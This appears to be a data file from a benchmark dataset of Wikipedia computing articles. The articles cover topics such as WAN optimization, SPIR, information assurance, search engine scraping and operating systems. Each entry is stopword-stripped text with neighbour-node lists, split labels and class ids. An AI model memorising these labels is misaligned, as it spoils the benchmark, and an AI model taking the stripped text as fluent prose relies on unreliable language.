WAN_optimization:wan optimization wan optimization collection techniques increasing data transfer efficiencies across wide-area networks wans 2008 wan optimization market estimated 1 billion grow 4.4 billion 2014 according gartner technology research firm 2015 gartner estimated wan optimization market 1.1 billion market common measures tcp data-transfer efficiencies i.e. optimization throughput bandwidth requirements latency protocol optimization congestion manifested dropped packets addition wan classified regards distance endpoints amounts data transferred two common business wan topologies branch headquarters data center data center dc2dc general branch wan links closer use less bandwidth support simultaneous connections support smaller connections short-lived connections handle greater variety protocols used business applications email content management systems database application web delivery comparison dc2dc wan links tend require bandwidth distant involve fewer connections connections bigger 100 mbit/s 1 gbit/s flows longer duration traffic dc2dc wan may include replication back data migration virtualization business continuity/disaster recovery bc/dr flows wan optimization subject extensive academic research almost since advent wan early 2000s research private public sectors turned improving end-to-end throughput tcp target first proprietary wan optimization solutions branch wan recent years however rapid growth digital data concomitant needs store protect presented need dc2dc wan optimization example optimizations performed increase overall network capacity utilization meet inter-datacenter transfer deadlines minimize average completion times data transfers another example private inter-datacenter wans benefit optimizations fast efficient geo-replication data content newly computed machine learning models multimedia content component techniques branch wan optimization include deduplication wide area file services wafs smb proxy https proxy media multicasting web caching bandwidth management requirements dc2dc wan optimization also center around deduplication tcp acceleration however must occur context multi-gigabit data transfer rates
[ 2985, 651, 8022, 8792, 1049, 8666 ]
Test
7,973
2
Malgun_Gothic:malgun gothic malgun gothic 맑은 고딕 korean sans-serif typeface developed sandoll communications hinting monotype imaging replacement dotum gulim default system font korean language version windows vista first shipped windows vista available download later windows server 2008 windows xp users name malgun means clear korean thus making direct translation font name clear gothic font uses segoe ui latin text korean glyphs created based typeface hunminjeongeum streamlined modern form characters well upright well-regulated strokes font supports ks x 1001 character set unlike dotum gulim han ideographic glyphs windows pull gulim hanja set instead initially fonts n't include half-width fixed latin glyphs hanja designed malgun gothic chinatype design monotype imaging inc. released windows 8 released glyphs n't rounded terminals windows vista includes two roman weights font windows 10 malgun gothic changed number characteristics shown significantly 2 1
[ 2593, 4130, 9539, 8422, 1098, 4138, 4141, 6797, 1487, 3538, 4146, 4148, 8374, 9654, 4127 ]
None
7,974
1
GEPIR:gepir gepir publicly available cost limits number requests per/day ip 30 gs1 offers similar paid service gs1 data hub provides additional capabilities without traffic limitations imposed gepir search 111 gs1 member organizations gepir since 2013 first digits gtin code called gs1 prefix used route query corresponding gs1 member organization results returned html xml countries soap webservice provides return code indicating error occurred gepir accessible free almost countries number request per day limited 20 30 since october 2013 gs1 france restricts access gepir companies registration siren number required use premium access created gs1 france january 2010 allows companies use gs1 web soap interface without limit price access public gepir lookup service coordinated gs1 go provides end users ability look information gs1 identification keys depending service systems provided gs1 member organisations mos 3rd party service providers gs1 mo choose provide service directly end users gs1 global office may provide service geography services involve technical component deployed gs1 global office coordinates systems provided gs1 mos and/or 3rd party service providers gepir service provided systems deployed gs1 mos gs1 go providing central point coordination federate local systems gs1 go also provides mo-level service mos wish deploy system nature synchronization gepir requires users know quality issues exceptions conformance program introduced gs1 2013
[ 2901, 10486, 479 ]
Validation
7,975
6
Everything_is_a_file:everything file everything file describes one defining features unix derivatives—that wide range input/output resources documents directories hard-drives modems keyboards printers even inter-process network communications simple streams bytes exposed filesystem name space advantage approach set tools utilities apis used wide range resources number file types file opened file descriptor created file path becoming addressing system file descriptor byte stream i/o interface file descriptors also created things like anonymous pipes network sockets via different methods therefore accurate description feature everything file descriptor additionally range pseudo virtual filesystems exists exposes information processes system information hierarchical file-like structure mounted single file hierarchy example purely virtual filesystem /proc exposes many system properties files files broader sense word standard unix file attributes owner access permissions queried classic unix tools filters however universally considered fast portable approach operating systems even mount /proc default due security speed concerns though used heavily widely installed busybox embedded systems procps used linux systems cases used implementations process-related posix shell commands similarly used android systems operating system toolbox program unix successor plan 9 took concept distributed computing 9p protocol
[ 9762, 9507, 516, 5452, 4589, 2479, 11568, 3571, 5363, 5492, 8499, 823, 11675, 2395, 6812, 6813 ]
Test
7,976
3
Way_of_the_Tiger:way tiger way tiger series adventure gamebooks mark smith jamie thomson set fantasy world orb reader takes part young monk/ninja avenger initially quest avenge foster father recover stolen scrolls later books presented challenges avenger overcome notably taking ruling city world orb originally created mark smith dungeons dragons game ran pupil brighton college mid-1970s orb also used setting fighting fantasy gamebook talisman death smith thomson book disclaimer front performing ninja related feats book could lead serious injury death untrained user sixth book inferno ends cliffhanger avenger trapped web black widow orb darkest blight new books released fate avenger orb unknown mark smith confirmed cliffhanger ending deliberate august 2013 original creators series working megara entertainment develop re-edited hardcover collector editions gamebooks including new prequel book 0 sequel book 7 potentially role-playing game based series two new books plus six re-edited original books reprinted paperback format megara entertainment 2014 made available pdfs 2019 december 2013 announced tin man games would releasing original six books series digital platforms 2014 2015 however 2017 nothing released original series comprises six books books could played sequence standalone adventures although playing sequence preserves continuity storyline played sequence abilities bonuses penalties special items avenger acquired carried next book expanded eight-book series consists following titles first last printed many years original six series featured combat system based unarmed fighting moves colourful names cobra strike punch leaping tiger kick avenger could also choose list ninja skills acrobatics poison needle spitting used variety appropriate weaponry garotte shuriken luck also played part form fate tests see fate smiled turned back avenger could also enhance skill using inner force similar qi energy series avenger could learn new skills shinren means understanding people intentions observing subtle clues books large number opponents recurring characters aside certain ancient titans called elder gods orb ruled various deities two video games based books released first way tiger beat 'em released gremlin graphics amstrad cpc zx spectrum commodore 16 commodore 64 game avenger fighting staves swords well utilizing unarmed combat avenger rarely used weapons apart shuriken books way tiger ii avenger action-adventure made gremlin graphics 1986 computers commodore 64 amstrad cpc zx spectrum msx game story yaemon grand master flame killed player foster-father naijish stolen scrolls kettsuin recover scrolls player find enough keys penetrate quench heart keep kill three guards game viewed top-down perspective superficially resembles gauntlet
[ 9006 ]
Test
7,977
9
Mobile_BASIC:mobile basic mobile basic proprietary dialect basic programming language used program java-enabled mobile phones possible interpreter midlet
[ 9714, 8262 ]
None
7,978
9
Standard_Portable_Intermediate_Representation:standard portable intermediate representation standard portable intermediate representation spir intermediate language parallel compute graphics khronos group originally developed use opencl spir rewritten spir-v march 2015 opencl uses just-in-time compilation jit necessitating one two software distribution patterns developers distribute device-specific pre-compiled binaries distribute relevant source code limited desire protect intellectual property spir enables creation distribution device-independent binaries within opencl stack spir originally introduced 2011 spir-v introduced 2015 spir prior 2015 spir-v release based llvm intermediate representation provisional specification spir 1.0 announced 2012 july 22 2013 provisional specification spir 1.2 announced siggraph 2013 final spir 1.2 specification released hipeac 2014 january 21 2014 august 11th 2014 provisional specification spir 2.0 released siggraph 2014 spir-v 1.0 rewritten version spir announced march 2015 released nov. 16 2015 spir family includes true cross-api standard fully defined khronos native support shader kernel features spir-v high-level intermediate language exchanged binary form functions represented control flow graph basic blocks using static single assignment ssa form data structures retain high-level hierarchical representation lossy like previous byte-code virtual machine-like intermediate representations used graphical shaders allows higher performance lowering target devices support ingestion spir-v incorporated core specification opencl 2.1 vulkan api opengl version 4.6 april 18th 2016 spir-v 1.1 released iwocl 2016 along provisional opencl 2.2 spir-v 1.1 added support opencl c++ initializer/finalizer function execution modes named barriers subgroup execution program scope pipes pipe storage may 16 2017 spir-v 1.2 released iwocl 2017 along opencl 2.2 spir-v 1.2 added support runtime specialization key tuning parameters opencl 2.2 march 7 2018 spir-v 1.3 released along vulkan 1.1 spir-v 1.3 added support subgroup operations enables enhanced compiler optimizations may 7 2019 spir-v 1.4 released
[ 8609, 8514, 9604, 5612, 4332, 3854, 7983, 10703, 6705, 8438, 7645 ]
None
7,979
4
Information_assurance:information assurance information assurance ia practice assuring information managing risks related use processing storage transmission information data systems processes used purposes information assurance includes protection integrity availability authenticity non-repudiation confidentiality user data uses physical technical administrative controls accomplish tasks focused predominantly information digital form full range ia encompasses digital also analog physical form protections apply data transit physical electronic forms well data rest various types physical electronic storage facilities ia best thought superset information security i.e umbrella term business outcome information risk management information assurance ia process getting right information right people right time ia benefits business use information risk management trust management resilience appropriate architecture system safety security increases utility information authorized users reduces utility information unauthorized strongly related field information security also business continuity ia relates business level strategic risk management information related systems rather creation application security controls therefore addition defending malicious hackers code e.g. viruses ia practitioners consider corporate governance issues privacy regulatory standards compliance auditing business continuity disaster recovery relate information systems information security draws primarily computer science ia interdisciplinary field requiring expertise business accounting user experience fraud examination forensic science management science systems engineering security engineering criminology addition computer science information assurance also term used governments including government united kingdom provision holistic security information systems use term interdisciplinary approach set somewhat lessened security/ systems engineering business continuity/ enterprise resilience forensic investigation threat analysis considered management science accounting criminology considered developing mitigation risks developed risk assessments conducted hmg information assurance standard 1 2 replaced hmg information security standard 2 sets principles requirements risk management accordance principles one information assurance standards currently used within uk public sector information assurance process typically begins enumeration classification information assets protected next ia practitioner perform risk assessment assets vulnerabilities information assets determined order enumerate threats capable exploiting assets assessment considers probability impact threat exploiting vulnerability asset impact usually measured terms cost asset stakeholders sum products threats impact probability occurring total risk information asset risk assessment complete ia practitioner develops risk management plan plan proposes countermeasures involve mitigating eliminating accepting transferring risks considers prevention detection response threats framework published standards organization nist rmf risk cobit pci dss iso/iec 27002 may guide development countermeasures may include technical tools firewalls anti-virus software policies procedures requiring controls regular backups configuration hardening employee training security awareness organizing personnel dedicated computer emergency response team cert computer security incident response team csirt cost benefit countermeasure carefully considered thus ia practitioner seek eliminate risks possible manage cost-effective way risk management plan implemented tested evaluated often means formal audits ia process iterative one risk assessment risk management plan meant periodically revised improved based data gathered completeness effectiveness number international national bodies issue standards information assurance practices policies procedures uk include information assurance advisory council information assurance collaboration group information assurance also evolved due social media
[ 5636, 1415, 4873, 2190, 5646, 5780, 1941, 10232, 7075, 11172, 2213, 8998, 8744, 943, 2607, 5423, 8881, 10034, 10290, 6593, 10821, 4678, 11594, 6604, 10190, 7887, 8656, 11470, 4948, 6360, 1369, 11609, 4956, 10845, 3552, 9184, 1762, 612, 496,...
Test
7,980
2
SchoolTool:schooltool schooltool gpl licensed free student information system schools around world goals project create simple turnkey student information system including demographics gradebook attendance calendaring reporting primary secondary schools well framework building customized applications configurations individual schools states schooltool built free software/open source software stack licensed gnu general public license version 2 written python using zope 3 framework sub-projects school tool follows schooltool configured default act often called student information system sis focus tracking information related students demographics enrollment grades attendance reporting subset complete “ management information system ” mis schools might also cover systems like accounting schooltool learning management system lms moodle although share overlapping feature sets gradebook schooltool contain curriculum learning objects post product news page october 2016 titled future sielibre schooltool indicates primary schooltool developers moved things accompanied google document explaining decision thanking contributors efforts
[ 3969, 6941, 546, 7983, 2864, 10683, 1101, 8909, 10701, 595, 8147, 10971, 10851, 9320, 11625, 8554, 1777, 8177, 8691, 119 ]
Test
7,981
9
JScheme:jscheme jscheme implementation scheme programming language created kenneth r. anderson timothy j. hickey peter norvig almost compliant r4rs scheme standard interface java distributed licence zlib/libpng jscheme free software
[ 4992, 10752, 11269, 3334, 6919, 7562, 2062, 9231, 1301, 9749, 9877, 8728, 4633, 6556, 3869, 10012, 2335, 6047, 8226, 4516, 5031, 9128, 5803, 5677, 7983, 2225, 10547, 11255, 311, 2105, 7867, 6717, 4799, 5569, 6594, 8771, 4550, 8262, 7880, ...
None
7,982
8
Search_engine_scraping:search engine scraping search engine scraping process harvesting urls descriptions information search engines google bing yahoo specific form screen scraping web scraping dedicated search engines commonly larger search engine optimization seo providers depend regularly scraping keywords search engines especially google monitor competitive position customers websites relevant keywords indexing status search engines like google allow sort automated access service legal point view known case broken law process entering website extracting data automated fashion also often called crawling search engines like google bing yahoo getting almost data automated crawling bots google far largest search engine users numbers well revenue creative advertisements makes google important search engine scrape seo related companies google take legal action scraping likely self-protective reasons however google using range defensive methods makes scraping results challenging task search engine defense thinks access might automated search engine react differently first layer defense captcha page user prompted verify real person bot tool solving captcha create cookie permits access search engine one day captcha page removed second layer defense similar error page without captcha case user completely blocked using search engine temporary block lifted user changes ip third layer defense longterm block entire network segment google blocked large network blocks months sort block likely triggered administrator happens scraping tool sending high number requests forms detection may also happen normal user especially users sharing ip address network class ipv4 ranges well ipv6 ranges scrape search engine successfully two major factors time amount keywords user needs scrape smaller time job difficult scraping developed scraping script tool needs scraping scripts need overcome technical challenges example open source scraping software makes use mentioned techniques googlescraper framework controls browsers devtools protocol makes hard google detect browser automated developing scraper search engine almost programming language used depending performance requirements languages favorable php commonly used language write scraping scripts websites backend services powerful capabilities built dom parsers libcurl memory usage typical 10 times factor similar c/c++ code ruby rails well python also frequently used automated scraping jobs highest performance c++ dom parsers considered even bash scripting used together curl command line tool scrape search engine developing search engine scraper several existing tools libraries available either used extended analyzed learn scraping websites services legal part often big concern companies web scraping greatly depends country scraping user/company well data website scraped many different court rulings world however comes scraping search engines situation different search engines usually list intellectual property repeat summarize information scraped websites largest public known incident search engine scraped happened 2011 microsoft caught scraping unknown keywords google rather new bing service even incident result court case one possible reason might search engines like google getting almost data scraping millions public reachable websites also without reading accepting terms legal case google microsoft would possibly put whole business risk
[ 2945, 8644, 8588, 113, 10033, 7965, 8639 ]
Test
7,983
2
Operating_system:operating system operating system os system software manages computer hardware software resources provides common services computer programs time-sharing operating systems schedule tasks efficient use system may also include accounting software cost allocation processor time mass storage printing resources hardware functions input output memory allocation operating system acts intermediary programs computer hardware although application code usually executed directly hardware frequently makes system calls os function interrupted operating systems found many devices contain computer cellular phones video game consoles web servers supercomputers dominant desktop operating system microsoft windows market share around 82.74 macos apple inc. second place 13.23 varieties linux collectively third place 1.57 mobile smartphone tablet combined sector use 2017 70 google android according third quarter 2016 data android smartphones dominant 87.5 percent growth rate 10.3 percent per year followed apple ios 12.1 percent per year decrease market share 5.2 percent operating systems amount 0.3 percent linux distributions dominant server supercomputing sectors specialized classes operating systems embedded real-time systems exist many applications single-tasking system run one program time multi-tasking operating system allows one program running concurrency achieved time-sharing available processor time divided multiple processes processes interrupted repeatedly time slices task-scheduling subsystem operating system multi-tasking may characterized preemptive co-operative types preemptive multitasking operating system slices cpu time dedicates slot programs unix-like operating systems solaris linux—as well non-unix-like amigaos—support preemptive multitasking cooperative multitasking achieved relying process provide time processes defined manner 16-bit versions microsoft windows used cooperative multi-tasking 32-bit versions windows nt win9x used preemptive multi-tasking single-user operating systems facilities distinguish users may allow multiple programs run tandem multi-user operating system extends basic concept multi-tasking facilities identify processes resources disk space belonging multiple users system permits multiple users interact system time time-sharing operating systems schedule tasks efficient use system may also include accounting software cost allocation processor time mass storage printing resources multiple users distributed operating system manages group distinct computers makes appear single computer development networked computers could linked communicate gave rise distributed computing distributed computations carried one machine computers group work cooperation form distributed system os distributed cloud computing context templating refers creating single virtual machine image guest operating system saving tool multiple running virtual machines technique used virtualization cloud computing management common large server warehouses embedded operating systems designed used embedded computer systems designed operate small machines like pdas less autonomy able operate limited number resources compact extremely efficient design windows ce minix 3 examples embedded operating systems real-time operating system operating system guarantees process events data specific moment time real-time operating system may single- multi-tasking multitasking uses specialized scheduling algorithms deterministic nature behavior achieved event-driven system switches tasks based priorities external events time-sharing operating systems switch tasks based clock interrupts library operating system one services typical operating system provides networking provided form libraries composed application configuration code construct unikernel specialized single address space machine image deployed cloud embedded environments early computers built perform series single tasks like calculator basic operating system features developed 1950s resident monitor functions could automatically run different programs succession speed processing operating systems exist modern complex forms early 1960s hardware features added enabled use runtime libraries interrupts parallel processing personal computers became popular 1980s operating systems made similar concept used larger computers 1940s earliest electronic digital systems operating systems electronic systems time programmed rows mechanical switches jumper wires plug boards special-purpose systems example generated ballistics tables military controlled printing payroll checks data punched paper cards programmable general purpose computers invented machine languages consisting strings binary digits 0 1 punched paper tape introduced sped programming process stern 1981 early 1950s computer could execute one program time user sole use computer limited period time would arrive scheduled time program data punched paper cards punched tape program would loaded machine machine would set work program completed crashed programs could generally debugged via front panel using toggle switches panel lights said alan turing master early manchester mark 1 machine already deriving primitive conception operating system principles universal turing machine later machines came libraries programs would linked user program assist operations input output generating computer code human-readable symbolic code genesis modern-day operating system however machines still ran single job time cambridge university england job queue one time washing line clothes line tapes hung different colored clothes-pegs indicate job-priority improvement atlas supervisor introduced manchester atlas commissioned 1962 considered many first recognisable modern operating system brinch hansen described significant breakthrough history operating systems 1950s many major features pioneered field operating systems mainframe computers including batch processing input/output interrupt buffering multitasking spooling runtime libraries link-loading programs sorting records files features included included application software option application programmers rather separate operating system used applications 1959 share operating system released integrated utility ibm 704 later 709 7090 mainframes although quickly supplanted ibsys/ibjob 709 7090 7094 1960s ibm os/360 introduced concept single os spanning entire product line crucial success system/360 machines ibm current mainframe operating systems distant descendants original system applications written os/360 still run modern machines os/360 also pioneered concept operating system keeps track system resources used including program data space allocation main memory file space secondary storage file locking update process terminated reason resources re-claimed operating system alternative cp-67 system s/360-67 started whole line ibm operating systems focused concept virtual machines operating systems used ibm s/360 series mainframes included systems developed ibm cos/360 compatibility operating system dos/360 disk operating system tss/360 time sharing system tos/360 tape operating system bos/360 basic operating system acp airline control program well non-ibm systems mts michigan terminal system music multi-user system interactive computing orvyl stanford timesharing system control data corporation developed scope operating system 1960s batch processing cooperation university minnesota kronos later nos operating systems developed 1970s supported simultaneous batch timesharing use like many commercial timesharing systems interface extension dartmouth basic operating systems one pioneering efforts timesharing programming languages late 1970s control data university illinois developed plato operating system used plasma panel displays long-distance time sharing networks plato remarkably innovative time featuring real-time chat multi-user graphical games 1961 burroughs corporation introduced b5000 mcp master control program operating system b5000 stack machine designed exclusively support high-level languages machine language assembler indeed mcp first os written exclusively high-level language espol dialect algol mcp also introduced many ground-breaking innovations first commercial implementation virtual memory development as/400 ibm made approach burroughs license mcp run as/400 hardware proposal declined burroughs management protect existing hardware production mcp still use today unisys clearpath/mcp line computers univac first commercial computer manufacturer produced series exec operating systems like early main-frame systems batch-oriented system managed magnetic drums disks card readers line printers 1970s univac produced real-time basic rtb system support large-scale time sharing also patterned dartmouth bc system general electric mit developed general electric comprehensive operating supervisor gecos introduced concept ringed security privilege levels acquisition honeywell renamed general comprehensive operating system gcos digital equipment corporation developed many operating systems various computer lines including tops-10 tops-20 time sharing systems 36-bit pdp-10 class systems widespread use unix tops-10 particularly popular system universities early arpanet community rt-11 single-user real-time os pdp-11 class minicomputer rsx-11 corresponding multi-user os late 1960s late 1970s several hardware capabilities evolved allowed similar ported software run one system early systems utilized microprogramming implement features systems order permit different underlying computer architectures appear others series fact 360s 360/40 except 360/165 360/168 microprogrammed implementations enormous investment software systems made since 1960s caused original computer manufacturers continue develop compatible operating systems along hardware notable supported mainframe operating systems include first microcomputers capacity need elaborate operating systems developed mainframes minis minimalistic operating systems developed often loaded rom known monitors one notable early disk operating system cp/m supported many early microcomputers closely imitated microsoft ms-dos became widely popular operating system chosen ibm pc ibm version called ibm dos pc dos 1980s apple computer inc. apple inc. abandoned popular apple ii series microcomputers introduce apple macintosh computer innovative graphical user interface gui mac os introduction intel 80386 cpu chip october 1985 32-bit architecture paging capabilities provided personal computers ability run multitasking operating systems like earlier minicomputers mainframes microsoft responded progress hiring dave cutler developed vms operating system digital equipment corporation would lead development windows nt operating system continues serve basis microsoft operating systems line steve jobs co-founder apple inc. started next computer inc. developed nextstep operating system nextstep would later acquired apple inc. used along code freebsd core mac os x macos latest name change gnu project started activist programmer richard stallman goal creating complete free software replacement proprietary unix operating system project highly successful duplicating functionality various parts unix development gnu hurd kernel proved unproductive 1991 finnish computer science student linus torvalds cooperation volunteers collaborating internet released first version linux kernel soon merged gnu user space components system software form complete operating system since combination two major components usually referred simply linux software industry naming convention stallman free software foundation remain opposed preferring name gnu/linux berkeley software distribution known bsd unix derivative distributed university california berkeley starting 1970s freely distributed ported many minicomputers eventually also gained following use pcs mainly freebsd netbsd openbsd unix originally written assembly language ken thompson wrote b mainly based bcpl based experience multics project b replaced c unix rewritten c developed large complex family inter-related operating systems influential every modern operating system see history unix-like family diverse group operating systems several major sub-categories including system v bsd linux name unix trademark open group licenses use operating system shown conform definitions unix-like commonly used refer large set operating systems resemble original unix unix-like systems run wide variety computer architectures used heavily servers business well workstations academic engineering environments free unix variants linux bsd popular areas four operating systems certified open group holder unix trademark unix hp hp-ux ibm aix descendants original system v unix designed run respective vendor hardware contrast sun microsystems solaris run multiple types hardware including x86 sparc servers pcs apple macos replacement apple earlier non-unix mac os hybrid kernel-based bsd variant derived nextstep mach freebsd unix interoperability sought establishing posix standard posix standard applied operating system although originally created various unix variants subgroup unix family berkeley software distribution family includes freebsd netbsd openbsd operating systems commonly found webservers although also function personal computer os internet owes much existence bsd many protocols commonly used computers connect send receive data network widely implemented refined bsd world wide web also first demonstrated number computers running os based bsd called nextstep 1974 university california berkeley installed first unix system time students staff computer science department began adding new programs make things easier text editors berkeley received new vax computers 1978 unix installed school undergraduates modified unix even order take advantage computer hardware possibilities defense advanced research projects agency us department defense took interest decided fund project many schools corporations government organizations took notice started use berkeley version unix instead official one distributed steve jobs upon leaving apple inc. 1985 formed next inc. company manufactured high-end computers running variation bsd called nextstep one computers used tim berners-lee first webserver create world wide web developers like keith bostic encouraged project replace non-free code originated bell labs done however sued two years legal disputes bsd project spawned number free derivatives netbsd freebsd 1993 openbsd netbsd 1995 macos formerly mac os x later os x line open core graphical operating systems developed marketed sold apple inc. latest pre-loaded currently shipping macintosh computers macos successor original classic mac os apple primary operating system since 1984 unlike predecessor macos unix operating system built technology developed next second half 1980s apple purchased company early 1997 operating system first released 1999 mac os x server 1.0 followed march 2001 client version mac os x v10.0 cheetah since six distinct client server editions macos released two merged os x 10.7 lion prior merging macos server edition macos server architecturally identical desktop counterpart usually ran apple line macintosh server hardware macos server included work group management administration software tools provide simplified access key network services including mail transfer agent samba server ldap server domain name server others mac os x v10.7 lion server aspects mac os x server integrated client version product re-branded os x dropping mac name server tools offered application linux kernel originated 1991 project linus torvalds university student finland posted information project newsgroup computer students programmers received support assistance volunteers succeeded creating complete functional kernel linux unix-like developed without unix code unlike bsd variants open license model linux kernel code available study modification resulted use wide range computing machinery supercomputers smart-watches although estimates suggest linux used 1.82 desktop laptop pcs widely adopted use servers embedded systems cell phones linux superseded unix many platforms used supercomputers including top 385 many computers also green500 different order linux runs top 10 linux also commonly used small energy-efficient computers smartphones smartwatches linux kernel used popular distributions red hat debian ubuntu linux mint google android chrome os chromium os microsoft windows family proprietary operating systems designed microsoft corporation primarily targeted intel architecture based computers estimated 88.9 percent total usage share web connected computers latest version windows 10 2011 windows 7 overtook windows xp common version use microsoft windows first released 1985 operating environment running top ms-dos standard operating system shipped intel architecture personal computers time 1995 windows 95 released used ms-dos bootstrap backwards compatibility win9x could run real-mode ms-dos 16-bit windows 3.x drivers windows released 2000 last version win9x family later versions based windows nt kernel current client versions windows run ia-32 x86-64 32-bit arm microprocessors addition itanium still supported older server version windows server 2008 r2 past windows nt supported additional architectures server editions windows widely used recent years microsoft expended significant capital effort promote use windows server operating system however windows usage servers widespread personal computers windows competes linux bsd server market share reactos windows-alternative operating system developed principles windows without using microsoft code many operating systems significant day longer amigaos os/2 ibm microsoft classic mac os non-unix precursor apple macos beos xts-300 risc os morphos haiku baremetal freemint still used niche markets continue developed minority platforms enthusiast communities specialist applications openvms formerly dec still active development hewlett-packard yet operating systems used almost exclusively academia operating systems education research operating system concepts typical example system fulfills roles minix example singularity used purely research another example oberon system designed eth zürich niklaus wirth jürg gutknecht group students former computer systems institute 1980s used mainly research teaching daily work wirth group operating systems failed win significant market share introduced innovations influenced mainstream operating systems least bell labs plan 9 components operating system exist order make different parts computer work together user software needs go operating system order use hardware whether simple mouse keyboard complex internet component aid firmware device drivers kernel provides basic level control computer hardware devices manages memory access programs ram determines programs get access hardware resources sets resets cpu operating states optimal operation times organizes data long-term non-volatile storage file systems media disks tapes flash memory etc operating system provides interface application program computer hardware application program interact hardware obeying rules procedures programmed operating system operating system also set services simplify development execution application programs executing application program involves creation process operating system kernel assigns memory space resources establishes priority process multi-tasking systems loads program binary code memory initiates execution application program interacts user hardware devices interrupts central operating systems provide efficient way operating system interact react environment alternative operating system watch various sources input events polling require action found older systems small stacks 50 60 bytes unusual modern systems large stacks interrupt-based programming directly supported modern cpus interrupts provide computer way automatically saving local register contexts running specific code response events even basic computers support hardware interrupts allow programmer specify code may run event takes place interrupt received computer hardware automatically suspends whatever program currently running saves status runs computer code previously associated interrupt analogous placing bookmark book response phone call modern operating systems interrupts handled operating system kernel interrupts may come either computer hardware running program hardware device triggers interrupt operating system kernel decides deal event generally running processing code amount code run depends priority interrupt example person usually responds smoke detector alarm answering phone processing hardware interrupts task usually delegated software called device driver may part operating system kernel part another program device drivers may relay information running program various means program may also trigger interrupt operating system program wishes access hardware example may interrupt operating system kernel causes control passed back kernel kernel processes request program wishes additional resources wishes shed resources memory triggers interrupt get kernel attention modern microprocessors cpu mpu support multiple modes operation cpus capability offer least two modes user mode supervisor mode general terms supervisor mode operation allows unrestricted access machine resources including mpu instructions user mode operation sets limits instruction use typically disallows direct access machine resources cpus might modes similar user mode well virtual modes order emulate older processor types 16-bit processors 32-bit one 32-bit processors 64-bit one power-on reset system begins supervisor mode operating system kernel loaded started boundary user mode supervisor mode also known kernel mode established supervisor mode used kernel low level tasks need unrestricted access hardware controlling memory accessed communicating devices disk drives video display devices user mode contrast used almost everything else application programs word processors database managers operate within user mode access machine resources turning control kernel process causes switch supervisor mode typically transfer control kernel achieved executing software interrupt instruction motorola 68000 codice_1 instruction software interrupt causes microprocessor switch user mode supervisor mode begin executing code allows kernel take control user mode programs usually access restricted set microprocessor instructions generally execute instructions could potentially cause disruption system operation supervisor mode instruction execution restrictions typically removed allowing kernel unrestricted access machine resources term user mode resource generally refers one cpu registers contain information running program n't allowed alter attempts alter resources generally causes switch supervisor mode operating system deal illegal operation program attempting example forcibly terminating killing program among things multiprogramming operating system kernel must responsible managing system memory currently use programs ensures program interfere memory already use another program since programs time share program must independent access memory cooperative memory management used many early operating systems assumes programs make voluntary use kernel memory manager exceed allocated memory system memory management almost never seen since programs often contain bugs cause exceed allocated memory program fails may cause memory used one programs affected overwritten malicious programs viruses may purposefully alter another program memory may affect operation operating system cooperative memory management takes one misbehaved program crash system memory protection enables kernel limit process access computer memory various methods memory protection exist including memory segmentation paging methods require level hardware support 80286 mmu n't exist computers segmentation paging certain protected mode registers specify cpu memory address allow running program access attempts access addresses trigger interrupt cause cpu re-enter supervisor mode placing kernel charge called segmentation violation seg-v short since difficult assign meaningful result operation usually sign misbehaving program kernel generally resorts terminating offending program reports error windows versions 3.1 level memory protection programs could easily circumvent need use general protection fault would produced indicating segmentation violation occurred however system would often crash anyway use virtual memory addressing paging segmentation means kernel choose memory program may use given time allowing operating system use memory locations multiple tasks program tries access memory n't current range accessible memory nonetheless allocated kernel interrupted way would program exceed allocated memory see section memory management unix kind interrupt referred page fault kernel detects page fault generally adjusts virtual memory range program triggered granting access memory requested gives kernel discretionary power particular application memory stored even whether actually allocated yet modern operating systems memory accessed less frequently temporarily stored disk media make space available use programs called swapping area memory used multiple programs memory area contains swapped exchanged demand virtual memory provides programmer user perception much larger amount ram computer really multitasking refers running multiple independent computer programs computer giving appearance performing tasks time since computers one two things one time generally done via time-sharing means program uses share computer time execute operating system kernel contains scheduling program determines much time process spends executing order execution control passed programs control passed process kernel allows program access cpu memory later control returned kernel mechanism another program may allowed use cpu so-called passing control kernel applications called context switch early model governed allocation time programs called cooperative multitasking model control passed program kernel may execute long wants explicitly returning control kernel means malicious malfunctioning program may prevent programs using cpu hang entire system enters infinite loop modern operating systems extend concepts application preemption device drivers kernel code operating system preemptive control internal run-times well philosophy governing preemptive multitasking ensuring programs given regular time cpu implies programs must limited much time allowed spend cpu without interrupted accomplish modern operating system kernels make use timed interrupt protected mode timer set kernel triggers return supervisor mode specified time elapsed see sections interrupts dual mode operation many single user operating systems cooperative multitasking perfectly adequate home computers generally run small number well tested programs amigaos exception preemptive multitasking first version windows nt first version microsoft windows enforced preemptive multitasking n't reach home user market windows xp since windows nt targeted professionals access data stored disks central feature operating systems computers store data disks using files structured specific ways order allow faster access higher reliability make better use drive available space specific way files stored disk called file system enables files names attributes also allows stored hierarchy directories folders arranged directory tree early operating systems generally supported single type disk drive one kind file system early file systems limited capacity speed kinds file names directory structures could use limitations often reflected limitations operating systems designed making difficult operating system support one file system many simpler operating systems support limited range options accessing storage systems operating systems like unix linux support technology known virtual file system vfs operating system unix supports wide array storage devices regardless design file systems allowing accessed common application programming interface api makes unnecessary programs knowledge device accessing vfs allows operating system provide programs access unlimited number devices infinite variety file systems installed use specific device drivers file system drivers connected storage device hard drive accessed device driver device driver understands specific language drive able translate language standard language used operating system access disk drives unix language block devices kernel appropriate device driver place access contents disk drive raw format may contain one file systems file system driver used translate commands used access specific file system standard set commands operating system use talk file systems programs deal file systems basis filenames directories/folders contained within hierarchical structure create delete open close files well gather various information including access permissions size free space creation modification dates various differences file systems make supporting file systems difficult allowed characters file names case sensitivity presence various kinds file attributes makes implementation single interface every file system daunting task operating systems tend recommend using support natively file systems specifically designed example ntfs windows ext3 reiserfs linux however practice third party drivers usually available give support widely used file systems general-purpose operating systems example ntfs available linux ntfs-3g ext2/3 reiserfs available windows third-party software support file systems highly varied among modern operating systems although several common file systems almost operating systems include support drivers operating systems vary file system support disk formats may installed windows file system usually limited application certain media example cds must use iso 9660 udf windows vista ntfs file system operating system installed possible install linux onto many types file systems unlike operating systems linux unix allow file system used regardless media stored whether hard drive disc cd dvd ... usb flash drive even contained within file located another file system device driver specific type computer software developed allow interaction hardware devices typically constitutes interface communicating device specific computer bus communications subsystem hardware connected providing commands and/or receiving data device end requisite interfaces operating system software applications specialized hardware-dependent computer program also operating system specific enables another program typically operating system applications software package computer program running operating system kernel interact transparently hardware device usually provides requisite interrupt handling necessary necessary asynchronous time-dependent hardware interfacing needs key design goal device drivers abstraction every model hardware even within class device different newer models also released manufacturers provide reliable better performance newer models often controlled differently computers operating systems expected know control every device future solve problem operating systems essentially dictate every type device controlled function device driver translate operating system mandated function calls device specific calls theory new device controlled new manner function correctly suitable driver available new driver ensures device appears operate usual operating system point view versions 